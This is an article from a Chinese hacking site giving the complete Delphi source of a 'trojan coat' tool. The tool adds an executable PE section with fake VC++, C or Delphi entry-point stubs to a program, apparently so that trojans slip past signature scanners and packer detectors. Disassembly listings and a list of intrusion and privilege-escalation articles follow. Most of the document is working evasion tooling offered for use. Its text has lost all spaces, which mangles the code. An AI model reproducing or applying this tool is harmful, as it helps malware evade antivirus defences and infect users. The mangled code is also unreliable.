说明：以VC++6的花指令为例说明

//VC++6外衣1

OEPCODEFIVE:THEAD=

($55,$8B,$EC,$6A,$FF,$68,$00,$00,$00,$00,$68,$00,$00,$00,$00,$64,

$A1,$00,$00,$00,$00,$50,$64,$89,$25,$00,$00,$00,$00,$83,$EC,$68,

$53,$56,$57,$58,$58,$58,$83,$C4,$68,$58,$67,$64,$A3,$00,$00,$58,

$58,$58,$58,$8B,$E8,$E9,$07,$B9,$FE,$FF,$00,$00,$00,$00,$00,$00);

//VC++6外衣2

OEPCODEFIVE:THEAD=

($55,$8B,$EC,$6A,$FF,$68,$00,$00,$00,$00,$68,$00,$00,$00,$00,$64,

$A1,$00,$00,$00,$00,$50,$64,$89,$25,$00,$00,$00,$00,$83,$EC,$68,

$53,$56,$57,$58,$58,$58,$83,$C4,$68,$58,$67,$64,$A3,$00,$00,$58,

$58,$58,$58,$8B,$E8,$B8,$00,$10,$40,$00,$FF,$E0,$90,$00,$00,$00);

1.直接将入口地址赋给寄存器eax,然后jmpeax

0046902AB8304A4500moveax,Project1.00454A30

0046902FFFE0jmpeax

0046903190nop

2.直接跳转到入口地址

00469124-E907B9FEFFjmpProject1.00454A30

两种效果实际上是一样的,但我们为了方便修改花指令跳转到原来的入口地址，通常取得原

peheader的AddressOfEntryPoint,然后给寄存器eax保存改值，所以第二种方法就不太方便，

所以一般采用第一种方法，JMPOFF为花指令代码到跳转指令的偏移，如对VisualC++的花指令

JMPOFF=54,其后免跟的是原入口地址，可以随便填写，程序加花指令是会自动修改，一般可以

默认设为00104000(即00401000).

通过汇编修改花指令跳转原入口地址的语句:

asm//这里说明一下，这是嵌入的汇编代码,寄存器—CPU暂时储存数据的东西，比内存更快，以提高效率

PUSHAD

LEAeax,OEPCODE//将OEPCODE的地址交给寄存器

ADDeax,JMPOFF//添加JMPOFF值给寄存器

MOVedx,AddressOfEntryPoint//转移指令，相当于付值语句，左边给右边

MOVDWORDptr[eax],edx//同上

POPAD

end;

}

unitUnit1;

interface

uses

Windows,Messages,SysUtils,Variants,Classes,Graphics,Controls,Forms,

Dialogs,StdCtrls,ExtCtrls,ShellAPI;

type

TForm1=class(TForm)

Label1:TLabel;

Edit1:TEdit;

Button1:TButton;

RadioGroup1:TRadioGroup;

Label2:TLabel;

Edit2:TEdit;

Label3:TLabel;

Edit3:TEdit;

CheckBox1:TCheckBox;

Button2:TButton;

Label5:TLabel;

OpenDialog1:TOpenDialog;

Label4:TLabel;

procedureButton1Click(Sender:TObject);

procedureobtain;

procedureButton2Click(Sender:TObject);

procedureLabel4Click(Sender:TObject);

procedureEdit3KeyPress(Sender:TObject;varKey:Char);

private

{Privatedeclarations}

FImageBase:DWORD;

procedureSetOepCode;

public

{Publicdeclarations}

end;

THEAD=array[0..63]ofbyte;

var

Form1:TForm1;

const

{MYSECTION='Fi7ke';//添加的节名，自定义

JMPOFF=43;//花指令的机器码,Ollydbg加载后随便取

//MicrosoftVisualC++

OEPCODE:THEAD=

($55,$8B,$EC,$6A,$FF,$68,$2A,$2C,$0A,$00,$68,$38,

$90,$0D,$00,$64,$A1,$00,$00,$00,$00,$50,$64,$89,

$25,$00,$00,$00,$00,$58,$64,$A3,$00,$00,$00,$00,

$58,$58,$58,$58,$8B,$E8,$B8,$00,$10,$40,$00,$FF,

$E0,$90,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,

$00,$00,$00,$00);}

//Nothingfound*one

OEPCODEONE:THEAD=

($55,$8B,$EC,$83,$C4,$F4,$83,$C4,$0C,$B8,$00,$10,$40,$00,$50,$C3,

$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,

$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,

$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00);

//Nothingfound*two

OEPCODETWO:THEAD=

($55,$8B,$EC,$41,$52,$90,$5A,$49,$5D,$41,$B8,$00,$10,$40,$00,$FF,

$E0,$90,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,

$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,

$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00);

//VC++外衣

OEPCODETHREE:THEAD=

($55,$8B,$EC,$6A,$FF,$68,$2A,$2C,$0A,$00,$68,$38,$90,$0D,$00,$64,

$A1,$00,$00,$00,$00,$50,$64,$89,$25,$00,$00,$00,$00,$58,$64,$A3,

$00,$00,$00,$00,$58,$58,$58,$58,$8B,$E8,$B8,$00,$10,$40,$00,$FF,

$E0,$90,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00);

//VC++5外衣

OEPCODEFOUR:THEAD=

($55,$8B,$EC,$6A,$FF,$68,$48,$54,$41,$00,$68,$A8,$21,$40,$00,$64,

$A1,$00,$00,$00,$00,$50,$64,$89,$25,$00,$00,$00,$00,$83,$C4,$94,

$53,$56,$57,$00,$00,$B8,$00,$10,$40,$00,$FF,$E0,$90,$00,$00,$00,

$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00);

//VC++6外衣

OEPCODEFIVE:THEAD=

($55,$8B,$EC,$6A,$FF,$68,$00,$00,$00,$00,$68,$00,$00,$00,$00,$64,

$A1,$00,$00,$00,$00,$50,$64,$89,$25,$00,$00,$00,$00,$83,$EC,$68,

$53,$56,$57,$58,$58,$58,$83,$C4,$68,$58,$67,$64,$A3,$00,$00,$58,

$58,$58,$58,$8B,$E8,$B8,$00,$10,$40,$00,$FF,$E0,$90,$00,$00,$00);

//C外衣

OEPCODESIX:THEAD=

($55,$8B,$EC,$6A,$FF,$68,$11,$11,$11,$00,$68,$22,$22,$22,$00,$64,

$A1,$00,$00,$00,$00,$50,$64,$89,$25,$00,$00,$00,$00,$58,$64,$A3,

$00,$00,$00,$00,$58,$58,$58,$58,$8B,$E8,$B8,$00,$10,$40,$00,$FF,

$E0,$90,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00);

OepCount=6;

//OEPCODEARRAY:array[0..OepCount-1,0..63]ofbyte=(

//OEPCODEARRAY:array[0..OepCount-1]ofarray[0..63]ofbyte=(

OEPCODEARRAY:array[0..OepCount-1]ofTHEAD=(

($55,$8B,$EC,$83,$C4,$F4,$83,$C4,$0C,$B8,$00,$10,$40,$00,$50,$C3,

$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,

$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,

$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00),//Nothingfound*one

($55,$8B,$EC,$6A,$FF,$68,$2A,$2C,$0A,$00,$68,$38,$90,$0D,$00,$64,

$A1,$00,$00,$00,$00,$50,$64,$89,$25,$00,$00,$00,$00,$58,$64,$A3,

$00,$00,$00,$00,$58,$58,$58,$58,$8B,$E8,$B8,$00,$10,$40,$00,$FF,

$E0,$90,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00),//VC++外衣

($55,$8B,$EC,$6A,$FF,$68,$48,$54,$41,$00,$68,$A8,$21,$40,$00,$64,

$A1,$00,$00,$00,$00,$50,$64,$89,$25,$00,$00,$00,$00,$83,$C4,$94,

$53,$56,$57,$00,$00,$B8,$00,$10,$40,$00,$FF,$E0,$90,$00,$00,$00,

$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00),//VC++5外衣

($55,$8B,$EC,$6A,$FF,$68,$00,$00,$00,$00,$68,$00,$00,$00,$00,$64,

$A1,$00,$00,$00,$00,$50,$64,$89,$25,$00,$00,$00,$00,$83,$EC,$68,

$53,$56,$57,$58,$58,$58,$83,$C4,$68,$58,$67,$64,$A3,$00,$00,$58,

$58,$58,$58,$8B,$E8,$B8,$00,$10,$40,$00,$FF,$E0,$90,$00,$00,$00),//VC++6外衣

($55,$8B,$EC,$6A,$FF,$68,$11,$11,$11,$00,$68,$22,$22,$22,$00,$64,

$A1,$00,$00,$00,$00,$50,$64,$89,$25,$00,$00,$00,$00,$58,$64,$A3,

$00,$00,$00,$00,$58,$58,$58,$58,$8B,$E8,$B8,$00,$10,$40,$00,$FF,

$E0,$90,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00),//C外衣

($55,$8B,$EC,$41,$52,$90,$5A,$49,$5D,$41,$B8,$00,$10,$40,$00,$FF,

$E0,$90,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,

$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,

$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00)//Nothingfound*two

);

JMPOFFARRAY:array[0..OepCount-1]ofinteger=(10,43,38,54,43,11);

{Nothingfound*ONE：

BorlandDelphi6.0-7.0

0046902200558Baddbyteptrss:[ebp-75],dl

00469025ECinal,dx

0046902683C4F4addesp,-0C

0046902983C40Caddesp,0C

0046902CB8304A4500moveax,Project1.00454A30

0046903150pusheax

00469032C3retn

Nothingfound*TWO

00454A7255pushebp

00454A738BECmovebp,esp

00454A7541incecx

00454A7652pushedx

00454A7790nop

00454A785Apopedx

00454A7949dececx

00454A7A5Dpopebp

00454A7B41incecx

0046902AB8304A4500moveax,Project1.00454A30

0046902FFFE0jmpeax

0046903190nop

C外衣：

00454A6C55pushebp

00454A6D8BECmovebp,esp

00454A6F6AFFpush-1

00454A716811111100push111111

00454A766822222200push222222

00454A7B64:A100000>moveax,dwordptrfs:[0]

00454A8150pusheax

00454A8264:8925000>movdwordptrfs:[0],esp

00454A8958popeax

00454A8A64:A300000>movdwordptrfs:[0],eax

00454A9058popeax

00454A9158popeax

00454A9258popeax

00454A9358popeax

00454A948BE8movebp,eax

00454A96-E965F5CAFFjmp00104000

VC++5外衣:

0046905FP>55pushebp

004690608BECmovebp,esp

004690626AFFpush-1

004690646848544100pushProject1.00415448

0046906968A8214000pushProject1.004021A8

0046906E64:A10000000>moveax,dwordptrfs:[0]

0046907450pusheax

0046907564:892500000>movdwordptrfs:[0],esp

0046907C83C494addesp,-6C

0046907F53pushebx

0046908056pushesi

0046908157pushedi

004690820000addbyteptrds:[eax],al

0046902AB8304A4500moveax,Project1.00454A30

0046902FFFE0jmpeax

0046903190nop

VC++外衣：

00469000P>55pushebp

004690018BECmovebp,esp

004690036AFFpush-1

00469005682A2C0A00push0A2C2A

0046900A6838900D00push0D9038

0046900F64:A10000000>moveax,dwordptrfs:[0]

0046901550pusheax

0046901664:892500000>movdwordptrfs:[0],esp

0046901D58popeax

0046901E64:A30000000>movdwordptrfs:[0],eax

0046902458popeax

0046902558popeax

0046902658popeax

0046902758popeax

004690288BE8movebp,eax

0046902AB8304A4500moveax,Project1.00454A30

0046902FFFE0jmpeax

0046903190nop

VC++6外衣：

004690EFP>55pushebp

004690F08BECmovebp,esp

004690F26AFFpush-1

004690F46800000000push0

004690F96800000000push0

004690FE64:A10000000>moveax,dwordptrfs:[0]

0046910450pusheax

0046910564:892500000>movdwordptrfs:[0],esp

0046910C83EC68subesp,68

0046910F53pushebx

0046911056pushesi

0046911157pushedi

0046911258popeax

0046911358popeax

0046911458popeax

0046911583C468addesp,68

0046911858popeax

0046911967:64:A30000movdwordptrfs:[0],eax

0046911E58popeax

0046911F58popeax

0046912058popeax

0046912158popeax

004691228BE8movebp,eax

0046902AB8304A4500moveax,Project1.00454A30

0046902FFFE0jmpeax

0046903190nop

}

functionIntToHex(Int:Int64;IntSize:Byte):String;

procedureAddSection(FName,MySection:string;SecSize:DWord);

implementation

{$R*.dfm}

var

OEPCODE:THEAD;

JMPOFF:integer;

functionIntToHex(Int:Int64;IntSize:Byte):String;

const

HexChars:array[0..15]ofChar=('0','1','2','3','4','5','6','7','8','9','a','b','c','d','e','f');

var

n:Byte;

begin

Result:='';

forn:=0toIntSize-1do

begin

Result:=HexChars[Intand$F]+Result;

Int:=Intshr$4;

end;

end;

procedureAddSection(FName,MySection:string;SecSize:DWord);

var

DOSHEADER:IMAGE_DOS_HEADER;//DOSMZheader

PEHEADER:IMAGE_NT_HEADERS;//PEheader

SectionHeader:IMAGE_SECTION_HEADER;//节表

MySectionHeader:IMAGE_SECTION_HEADER;//自定义节表

fs:TFileStream;

AddressOfEntryPoint:DWORD;//入口点

i:integer;

begin

fs:=TFileStream.Create(FName,fmOpenReadWrite+

fmShareDenyWrite);

try

{Tstream中定义的虚方法有四个：

1、Read:此方法实现将数据从流中读出。函数原形为：

FunctionRead(varBuffer;Count:Longint):Longint;virtual;abstract;

参数Buffer为数据读出时放置的缓冲区，Count为需要读出的数据的字节数，该方法返回值为实际读出的字节数，它可以小于或等于Count中指定的值。

2、Write:此方法实现将数据写入流中。函数原形为：

FunctionWrite(varBuffer;Count:Longint):Longint;virtual;abstract;

参数Buffer为将要写入流中的数据的缓冲区，Count为数据的长度字节数，该方法返回值为实际写入流中的字节数。

3、Seek:此方法实现流中读取指针的移动。函数原形为：

FunctionSeek(Offset:Longint;Origint:Word):Longint;virtual;abstract;

参数Offset为偏移字节数,参数Origint指出Offset的实际意义，其可能的取值如下：

soFromBeginning:Offset为移动后指针距离数据开始的位置。此时Offset必须大于或者等于零。

soFromCurrent:Offset为移动后指针与当前指针的相对位置。

soFromEnd:Offset为移动后指针距离数据结束的位置。此时Offset必须小于或者等于零。该方法返回值为移动后指针的位置。

4、Setsize:此方法实现改变数据的大小。函数原形为：

FunctionSetsize(NewSize:Longint);virtual;}

//将指针偏移量放到文件头部

fs.Seek(0,soFromBeginning);

//读取DOS头信息

fs.Read(DOSHEADER,sizeof(DOSHEADER));

//DOSMZheader又命名为IMAGE_DOS_HEADER.。其中只有两个域比较重要:

//e_magic包含字符串"MZ"，e_lfanew包含PEheader在文件中的偏移量。

//将指针移到PEheader在文件中的偏移量

fs.Seek(DOSHEADER._lfanew,soFromBeginning);

//读取PEheader头信息

fs.Read(PEHEADER,sizeOf(PEHEADER));

//PEHEADER.FileHeader.NumberOfSections:文件的节数目。如果我们要在文件中增加或删除一个节，就需要修改这个值。

//将指针移到节表在当前位置的相对偏移量

fs.Seek(sizeOf(SectionHeader)*

(PEHEADER.FileHeader.NumberOfSections-1),soFromCurrent);

//读取节表的信息

fs.Read(SectionHeader,sizeof(IMAGE_SECTION_HEADER));

//节名长不超过8字节。记住节名仅仅是个标记而已,我们选择任何名字甚至空着也行

{MySectionHeader.Name[0]:=ord('F');

MySectionHeader.Name[1]:=ord('i');

MySectionHeader.Name[2]:=ord('7');

MySectionHeader.Name[3]:=ord('k');

MySectionHeader.Name[4]:=ord('e');

MySectionHeader.Name[5]:=0;

MySectionHeader.Name[6]:=0;

MySectionHeader.Name[7]:=0;}

fori:=0to7do

begin

MySectionHeader.Name[i]:=0;

ifi<length(MySection)then

MySectionHeader.Name[i]:=Ord(MySection[i+1]);

end;

//VirtualAddress本节的RVA（相对虚拟地址）。PE装载器将节映射至内存时会读取本值，因此如果域值是1000h，

//而PE文件装在地址400000h处，那么本节就被载到401000h。

//SizeOfImage内存中整个PE映像体的尺寸。它是所有头和节经过节对齐处理后的大小。

MySectionHeader.VirtualAddress:=PEHEADER.OptionalHeader.SizeOfImage;

//节的大小$200十六进制＝512字节最好大于512不然可能会出错

//MySectionHeader.Misc.VirtualSize:=$200;

MySectionHeader.Misc.VirtualSize:=SecSize;//StrToInt(IntToHex(SecSize,sizeof(SecSize)));

//SizeOfRawData经过文件对齐处理后节尺寸，PE装载器提取本域值了解需映射入内存的节字节数。

//（译者注:假设一个文件的文件对齐尺寸是0x200，如果前面的VirtualSize域指示本节长度是0x388字节，

//则本域值为0x400，表示本节是0x400字节长）。

//FileAlignment文件中节对齐的粒度。例如，如果该值是(200h),，那么每节的起始地址必须是512的倍数。

//若第一节从文件偏移量200h开始且大小是10个字节，则下一节必定位于偏移量400h:

//即使偏移量512和1024之间还有很多空间没被使用/定义。

MySectionHeader.SizeOfRawData:=(MySectionHeader.VirtualAddressdiv

PEHEADER.OptionalHeader.FileAlignment+1)*PEHEADER.OptionalHeader.FileAlignment-

PEHEADER.OptionalHeader.SizeOfImage;

//这是节基于文件的偏移量，PE装载器通过本域值找到节数据在文件中的位置。

MySectionHeader.PointerToRawData:=

SectionHeader.SizeOfRawData+SectionHeader.PointerToRawData;

//包含标记以指示节属性，比如节是否含有可执行代码、初始化数据、未初始数据，是否可写、可读等。

MySectionHeader.Characteristics:=$E0000020;

{PE装载器的工作:

1.读取IMAGE_FILE_HEADER的NumberOfSections域，知道文件的节数目。

2.SizeOfHeaders域值作为节表的文件偏移量，并以此定位节表。

3.遍历整个结构数组检查各成员值。

4.对于每个结构，我们读取PointerToRawData域值并定位到该文件偏移量。然后再读取SizeOfRawData域值来决定

映射内存的字节数。将VirtualAddress域值加上ImageBase域值等于节起始的虚拟地址。然后就准备把节映射进内存，

并根据Characteristics域值设置属性。

5.遍历整个数组，直至所有节都已处理完毕。

注意我们并没有使用节名:这其实并不重要。}

//节表数量加一

Inc(PEHEADER.FileHeader.NumberOfSections);

//写入新加入的节表

fs.Write(MySectionHeader,sizeOf(MySectionHeader));

//将指针移到PEheader在文件中的偏移量

fs.Seek(DOSHEADER._lfanew,soFromBeginning);

//PE装载器准备运行的PE文件的第一个指令的RVA。若您要改变整个执行的流程，

//可以将该值指定到新的RVA，这样新RVA处的指令首先被执行。

AddressOfEntryPoint:=PEHEADER.OptionalHeader.AddressOfEntryPoint;

//将入口地址指定到新加节表的RVA(相对虚拟地址)

PEHEADER.OptionalHeader.AddressOfEntryPoint:=

MySectionHeader.VirtualAddress;

//win32子系统版本。

PEHEADER.OptionalHeader.MajorLinkerVersion:=7;

PEHEADER.OptionalHeader.MinorLinkerVersion:=0;

AddressOfEntryPoint:=AddressOfEntryPoint+

PEHEADER.OptionalHeader.ImageBase;

asm//这里说明一下，这是嵌入的汇编代码,寄存器—CPU暂时储存数据的东西，比内存更快，以提高效率

PUSHAD

LEAeax,OEPCODE//将OEPCODE的地址交给寄存器

ADDeax,JMPOFF//添加JMPOFF值给寄存器

MOVedx,AddressOfEntryPoint//转移指令，相当于付值语句，左边给右边

MOVDWORDptr[eax],edx//同上

POPAD

end;

//更改内存中整个PE映像体的尺寸

PEHEADER.OptionalHeader.SizeOfImage:=

PEHEADER.OptionalHeader.SizeOfImage+MySectionHeader.Misc.VirtualSize;

//写入PEHEADER信息

fs.Write(PEHEADER,sizeof(PEHEADER));

//移动指针到文件尾部

fs.Seek(fs.Size,soFromBeginning);

//写入花指令数据

fs.Write(OEPCODE,MySectionHeader.Misc.VirtualSize);

finally

fs.Free;

end;

end;

procedureTForm1.Button1Click(Sender:TObject);

begin

ifOpenDialog1.Executethen

edit1.Text:=OpenDialog1.FileName;

end;

procedureTForm1.obtain;

var

DOSHEADER:IMAGE_DOS_HEADER;

PEHEADER:IMAGE_NT_HEADERS;

fs:TFileStream;

begin

fs:=TFileStream.Create(Edit1.Text,fmOpenReadWrite+

fmShareDenyWrite);

try

fs.Seek(0,soFromBeginning);

fs.Read(DOSHEADER,sizeof(DOSHEADER));

fs.Seek(DOSHEADER._lfanew,soFromBeginning);

fs.Read(PEHEADER,sizeOf(PEHEADER));

FImageBase:=PEHEADER.OptionalHeader.ImageBase;

finally

fs.Free;

end;

end;

procedureTForm1.Button2Click(Sender:TObject);

var

FName,SecName:string;

SecSize:DWord;

begin

iftrim(Edit1.Text)=''then

begin

Messagebox(Handle,'请选择你要伪装的程序!','提示',MB_OK+MB_ICONSTOP);

Exit;

end;

FName:=trim(Edit1.Text);

SecName:=trim(Edit2.Text);

ifSecName=''thenSecName:='.hnxyy';

SecSize:=512;

iftrim(edit3.Text)<>''then

begin

SecSize:=strtoint(trim(Edit3.Text));

ifSecSize<512thenSecSize:=512;

end;

ifCheckBox1.Checkedthen

CopyFile(PChar(FName),PChar(Fname+'.bak'),False);

SetOepCode;

AddSection(FName,SecName,SecSize);

Messagebox(Handle,'伪装成功!','提示',MB_OK+MB_ICONINFORMATION);

end;

procedureTForm1.SetOepCode;

begin

OEPCODE:=OEPCODEARRAY[RadioGroup1.ItemIndex];

JMPOFF:=JMPOFFARRAY[RadioGroup1.ItemIndex];

end;

procedureTForm1.Label4Click(Sender:TObject);

begin

ShellExecute(Handle,'open','http://forum.wrsky.com','','',SW_SHOWNORMAL);

end;

procedureTForm1.Edit3KeyPress(Sender:TObject;varKey:Char);

begin

ifnot(keyin['0'..'9',#8,#13])then

begin

key:=#0;

end;

end;

end.

【一个简单的花指令伪装器-Delphi版木马彩衣】相关文章：

★ MSIE DHTML Edit跨站脚本漏洞

★ 最新dvbbs 7.1sql提权得shell

★ 记一次巧妙的hacking

★ 新型网络攻击威胁大量网站

★ Serv-U本地权限提升的ASP版实现

★ AngelShell：让所有正向程序实现反向连接（应用篇）

★ 由mysql弱口令取得system权限的实战

★ 游戏外挂分析

★ 网吧入侵之攻无不克！

★ Dvbbs7.1 sp1 SQL版savepost.asp注入漏洞分析、利用及防范